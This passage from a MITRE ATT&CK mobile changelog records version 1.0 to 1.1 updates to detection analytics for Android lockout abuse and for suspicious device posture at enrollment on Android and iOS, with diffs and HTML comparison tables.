class=\"diff_sub\">ction&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sequent&nbsp;behavior&nbsp;divergence&nbsp;(capability&nbsp;gating,&nbsp;alternate&nbsp;co</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">de&nbsp;paths)&nbsp;and/or&nbsp;near-term&nbsp;outbound&nbsp;connections,&nbsp;suggesting&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">device&nbsp;fingerprinting&nbsp;for&nbsp;decision-making&nbsp;rather&nbsp;than&nbsp;normal</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;telemetry.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a5c4230b-7064-4863-9a60-e0565042d452",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:31.921000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0603#AN1652",
                            "external_id": "AN1652"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1652",
                    "description": "Correlates (1) acquisition or presence of elevated control paths capable of forcing a lock state or blocking user interaction, (2) invocation of screen-locking or UI-denial behavior such as DevicePolicyManager lock operations, persistent overlays, accessibility-driven navigation interruption, or foreground lock-screen impersonation, and (3) immediate transition of the device into an unavailable or repeatedly re-locked state while the responsible application remains installed and active. The defender observes a causal chain where an application first gains the ability to control lock-related behavior, then forces or simulates lockout, and the device becomes unusable to the legitimate user.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application enabled as device administrator, device owner, or profile owner before screen-lock or password-control activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application granted accessibility service privileges capable of intercepting UI flow or sustaining user-interaction denial before lockout event"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between privileged control acquisition, lockout action, and resulting device lock state"
                        },
                        {
                            "field": "ProtectedRoleSet",
                            "description": "Set of elevated roles that materially increase lockout capability, such as device admin, device owner, profile owner, or accessibility service"
                        },
                        {
                            "field": "LockActionSet",
                            "description": "Framework actions treated as lockout-relevant, including lockNow, password-control changes, overlay persistence, and UI-denial actions"
                        },
                        {
                            "field": "AllowedAdminApps",
                            "description": "Baseline of legitimate enterprise or security apps expected to invoke lock-related controls"
                        },
                        {
                            "field": "RelockThreshold",
                            "description": "Number of repeated lock or lock-like transitions in a short interval required before escalation"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Outbound traffic threshold confirming continued meaningful activity after lockout"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between privileged control acquisition, lockout action, and resulting device lock state\"}, {\"field\": \"ProtectedRoleSet\", \"description\": \"Set of elevated roles that materially increase lockout capability, such as device admin, device owner, profile owner, or accessibility service\"}, {\"field\": \"LockActionSet\", \"description\": \"Framework actions treated as lockout-relevant, including lockNow, password-control changes, overlay persistence, and UI-denial actions\"}, {\"field\": \"AllowedAdminApps\", \"description\": \"Baseline of legitimate enterprise or security apps expected to invoke lock-related controls\"}, {\"field\": \"RelockThreshold\", \"description\": \"Number of repeated lock or lock-like transitions in a short interval required before escalation\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Outbound traffic threshold confirming continued meaningful activity after lockout\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:31.921000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) acquisition or presence of elevated control paths capable of forcing a lock state or blocking user interaction, (2) invocation of screen-locking or UI-denial behavior such as DevicePolicyManager lock operations, persistent overlays, accessibility-driven navigation interruption, or foreground lock-screen impersonation, and (3) immediate transition of the device into an unavailable or repeatedly re-locked state while the responsible application remains installed and active. The defender observes a causal chain where an application first gains the ability to control lock-related behavior, then forces or simulates lockout, and the device becomes unusable to the legitimate user.\", \"old_value\": \"The user can view a list of device administrators in device settings and revoke permission where appropriate. Applications that request device administrator permissions should be scrutinized further for malicious behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application enabled as device administrator, device owner, or profile owner before screen-lock or password-control activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application granted accessibility service privileges capable of intercepting UI flow or sustaining user-interaction denial before lockout event\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to76__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to76__0\"><a href=\"#difflib_chg_to76__top\">t</a></td><td class=\"diff_header\" id=\"from76_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;view&nbsp;a&nbsp;list&nbsp;of&nbsp;device&nbsp;administrators&nbsp;in&nbsp;device&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to76__top\">t</a></td><td class=\"diff_header\" id=\"to76_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;acquisition&nbsp;or&nbsp;presence&nbsp;of&nbsp;elevated&nbsp;control&nbsp;p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">settings&nbsp;and&nbsp;revoke&nbsp;permission&nbsp;where&nbsp;appropriate.&nbsp;Applicatio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aths&nbsp;capable&nbsp;of&nbsp;forcing&nbsp;a&nbsp;lock&nbsp;state&nbsp;or&nbsp;blocking&nbsp;user&nbsp;intera</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;that&nbsp;request&nbsp;device&nbsp;administrator&nbsp;permissions&nbsp;should&nbsp;be&nbsp;s</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ction,&nbsp;(2)&nbsp;invocation&nbsp;of&nbsp;screen-locking&nbsp;or&nbsp;UI-denial&nbsp;behavio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">crutinized&nbsp;further&nbsp;for&nbsp;malicious&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;such&nbsp;as&nbsp;DevicePolicyManager&nbsp;lock&nbsp;operations,&nbsp;persistent&nbsp;ov</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">erlays,&nbsp;accessibility-driven&nbsp;navigation&nbsp;interruption,&nbsp;or&nbsp;for</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eground&nbsp;lock-screen&nbsp;impersonation,&nbsp;and&nbsp;(3)&nbsp;immediate&nbsp;transit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;of&nbsp;the&nbsp;device&nbsp;into&nbsp;an&nbsp;unavailable&nbsp;or&nbsp;repeatedly&nbsp;re-locke</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;state&nbsp;while&nbsp;the&nbsp;responsible&nbsp;application&nbsp;remains&nbsp;installed&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">and&nbsp;active.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;an&nbsp;ap</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">plication&nbsp;first&nbsp;gains&nbsp;the&nbsp;ability&nbsp;to&nbsp;control&nbsp;lock-related&nbsp;be</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">havior,&nbsp;then&nbsp;forces&nbsp;or&nbsp;simulates&nbsp;lockout,&nbsp;and&nbsp;the&nbsp;device&nbsp;bec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">omes&nbsp;unusable&nbsp;to&nbsp;the&nbsp;legitimate&nbsp;user.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9e2b0e14-eabd-4eb7-93b0-da238e3786db",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-16 21:48:51.316000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0604#AN1653",
                            "external_id": "AN1653"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1653",
                    "description": "The defender observes a newly enrolled or recently activated device presenting abnormal integrity, hardware-backed attestation, or firmware/build relationships at the management plane, followed by privileged or system-context access to protected resources or framework paths, and then outbound communication inconsistent with setup state, lock state, or recent user interaction. The causal sequence is strongest when the device has not yet reached a normal trusted posture but still exhibits system-level capability use or network activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Device enrollment or compliance event shows failed or degraded verified boot, hardware-backed attestation mismatch, patch/build/baseband inconsistency, or unexpected device property drift near first contact"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Protected resource use or privileged framework access occurs while device is locked, before normal setup completion, or from an app/service not in foreground and not on approved preload list"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between enrollment/posture anomaly, privileged capability use, and network egress."
                        },
                        {
                            "field": "AllowedOEMComponents",
                            "description": "Approved system identities, preload packages, and OEM services differ by model and fleet."
                        },
                        {
                            "field": "AllowedDestinations",
                            "description": "OEM update, activation, MDM, and enterprise service destinations vary by environment."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Some protected resource access may be legitimate only when the app is foregrounded."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close resource access must be to user interaction to be considered expected."
                        },
                        {
                            "field": "EnrollmentGracePeriod",
                            "description": "Initial setup/update behavior may generate benign network or configuration drift for a short period."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Size threshold for suspicious outbound transfer from a device in abnormal posture."
                        },
                        {
                            "field": "ApprovedImageBaseline",
                            "description": "Known-good build fingerprint, patch, boot state, and baseband combinations vary by device fleet."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between enrollment/posture anomaly, privileged capability use, and network egress.\"}, {\"field\": \"AllowedOEMComponents\", \"description\": \"Approved system identities, preload packages, and OEM services differ by model and fleet.\"}, {\"field\": \"AllowedDestinations\", \"description\": \"OEM update, activation, MDM, and enterprise service destinations vary by environment.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Some protected resource access may be legitimate only when the app is foregrounded.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close resource access must be to user interaction to be considered expected.\"}, {\"field\": \"EnrollmentGracePeriod\", \"description\": \"Initial setup/update behavior may generate benign network or configuration drift for a short period.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Size threshold for suspicious outbound transfer from a device in abnormal posture.\"}, {\"field\": \"ApprovedImageBaseline\", \"description\": \"Known-good build fingerprint, patch, boot state, and baseband combinations vary by device fleet.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-16 21:48:51.316000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender observes a newly enrolled or recently activated device presenting abnormal integrity, hardware-backed attestation, or firmware/build relationships at the management plane, followed by privileged or system-context access to protected resources or framework paths, and then outbound communication inconsistent with setup state, lock state, or recent user interaction. The causal sequence is strongest when the device has not yet reached a normal trusted posture but still exhibits system-level capability use or network activity.\", \"old_value\": \"Integrity checking mechanisms can potentially detect unauthorized hardware modifications.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Device enrollment or compliance event shows failed or degraded verified boot, hardware-backed attestation mismatch, patch/build/baseband inconsistency, or unexpected device property drift near first contact\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Protected resource use or privileged framework access occurs while device is locked, before normal setup completion, or from an app/service not in foreground and not on approved preload list\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to204__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to204__0\"><a href=\"#difflib_chg_to204__top\">t</a></td><td class=\"diff_header\" id=\"from204_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Integrity&nbsp;checking&nbsp;mechanisms&nbsp;can&nbsp;potentially&nbsp;detect&nbsp;unautho</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to204__top\">t</a></td><td class=\"diff_header\" id=\"to204_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;newly&nbsp;enrolled&nbsp;or&nbsp;recently&nbsp;activated</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">rized&nbsp;hardware&nbsp;modifications.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;device&nbsp;presenting&nbsp;abnormal&nbsp;integrity,&nbsp;hardware-backed&nbsp;attes</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tation,&nbsp;or&nbsp;firmware/build&nbsp;relationships&nbsp;at&nbsp;the&nbsp;management&nbsp;pl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ane,&nbsp;followed&nbsp;by&nbsp;privileged&nbsp;or&nbsp;system-context&nbsp;access&nbsp;to&nbsp;prot</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ected&nbsp;resources&nbsp;or&nbsp;framework&nbsp;paths,&nbsp;and&nbsp;then&nbsp;outbound&nbsp;commun</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ication&nbsp;inconsistent&nbsp;with&nbsp;setup&nbsp;state,&nbsp;lock&nbsp;state,&nbsp;or&nbsp;recent</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;user&nbsp;interaction.&nbsp;The&nbsp;causal&nbsp;sequence&nbsp;is&nbsp;strongest&nbsp;when&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;device&nbsp;has&nbsp;not&nbsp;yet&nbsp;reached&nbsp;a&nbsp;normal&nbsp;trusted&nbsp;posture&nbsp;but&nbsp;sti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ll&nbsp;exhibits&nbsp;system-level&nbsp;capability&nbsp;use&nbsp;or&nbsp;network&nbsp;activity.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--53491f5a-7062-41f0-a51d-07b52dc8192c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-16 22:10:25.735000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0604#AN1654",
                            "external_id": "AN1654"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1654",
                    "description": "The defender observes a device at activation, supervision, or enrollment time with unusual management-plane posture, inventory, or trust characteristics and then relies primarily on downstream network effects and device state inconsistencies rather than direct low-level process telemetry. On iOS, the most reliable sequence is supervision/attestation or inventory concern near first contact followed by network egress or protected-state behavior that is inconsistent with lock state, setup phase, or expected managed app activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Supervised enrollment, activation, or inventory event reveals unexpected device property relationships, anomalous managed posture, unexplained configuration drift near first contact, or identity/inventory characteristics inconsistent with approved procurement baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app or device-originated network activity occurs while the device is locked or before expected managed app initialization sequence, inconsistent with expected background refresh baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between enrollment/inventory concern and suspicious network activity."
                        },
                        {
                            "field": "SupervisedRequired",
                            "description": "Most strong posture and inventory analytics require supervised iOS devices."
                        },
                        {
                            "field": "AllowedDestinations",
                            "description": "Apple, MDM, update, enterprise, and managed SaaS destinations vary by organization."
                        },
                        {
                            "field": "BackgroundRefreshBaseline",
                            "description": "Expected background network behavior varies by managed app set and policy."
                        },
                        {
                            "field": "ActivationGracePeriod",
                            "description": "Benign activation, restore, and setup traffic can be noisy immediately after provisioning."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how recently the user must have interacted for activity to be considered expected."
                        },
                        {
                            "field": "InventoryDriftTolerance",
                            "description": "Tuning for acceptable changes in inventory/configuration during upgrades or replacements."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between enrollment/inventory concern and suspicious network activity.\"}, {\"field\": \"SupervisedRequired\", \"description\": \"Most strong posture and inventory analytics require supervised iOS devices.\"}, {\"field\": \"AllowedDestinations\", \"description\": \"Apple, MDM, update, enterprise, and managed SaaS destinations vary by organization.\"}, {\"field\": \"BackgroundRefreshBaseline\", \"description\": \"Expected background network behavior varies by managed app set and policy.\"}, {\"field\": \"ActivationGracePeriod\", \"description\": \"Benign activation, restore, and setup traffic can be noisy immediately after provisioning.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how recently the user must have interacted for activity to be considered expected.\"}, {\"field\": \"InventoryDriftTolerance\", \"description\": \"Tuning for acceptable changes in inventory/configuration during upgrades or replacements.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-16 22:10:25.735000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender observes a device at activation, supervision, or enrollment time with unusual management-plane posture, inventory, or trust characteristics and then relies primarily on downstream network effects and device state inconsistencies rather than direct low-level process telemetry. On iOS, the most reliable sequence is supervision/attestation or inventory concern near first contact followed by network egress or protected-state behavior that is inconsistent with lock state, setup phase, or expected managed app activity.\", \"old_value\": \"Integrity checking mechanisms can potentially detect unauthorized hardware modifications.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Supervised enrollment, activation, or inventory event reveals unexpected device property relationships, anomalous managed posture, unexplained configuration drift near first contact, or identity/inventory characteristics inconsistent with approved procurement baseline\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app or device-originated network activity occurs while the device is locked or before expected managed app initialization sequence, inconsistent with expected background refresh baseline\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": 